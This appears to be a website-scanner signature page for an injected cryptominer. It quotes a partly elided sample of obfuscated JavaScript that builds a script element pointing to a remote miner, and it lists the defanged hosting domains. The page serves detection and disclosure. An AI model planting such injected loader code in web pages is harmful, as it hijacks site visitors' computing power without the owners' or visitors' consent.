SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.cryptominer.7

malware.cryptominer.7

Description:
Website contains an encrypted "Minr" JavaScript miner, which usually means that it's used without webmaster's consent.

var _0x582d=​['c2NyaXB0','c3Jj','aHR0cHM6Ly9ob3N0LmQtbnMuZ2EvaW5...skipped...oZWNrPWZhbHNl','aGVhZA==','YXBwZW5kQ2hpbGQ=','Y3JlYXRlRWxlbWVudA=='];(function(a,d){var b=function(b){while(--b){a['push'](a['shift']());}};var c=function(){var a={'data':​{'key':'​cookie','value':'​timeout'},'setCookie​':function(b​,h,i,e){e=e||{};var c=h+'='+i;var a=0x0;for(var a=0x0,f=b['length'];a...skipped...
;_0x2ecabc(​);var el=document​[_0xd582('​0x0')](_0xd582('0x1'));el[_0xd582('​0x2')]=_0xd582('0x3');document​[_0xd582('0x4')][_0xd582('​0x5')](​el); 

This code injects a Minr from hxxps://abc.pema.cl/inject.js?key=<key>&throttle=0.15&se_check=false, hxxps://host.d-ns[.]ga/inject.js?key=<key>&throttle=0.5&se_check=false or some other disposable domains like st.kjli[.]fi, host.d-ns[.]ga, abc.pema[.]cl, metrika.ron[.]si minr[.]pw, xy.nullrefexcep[.]com.

Affecting: Any web site (no specific target).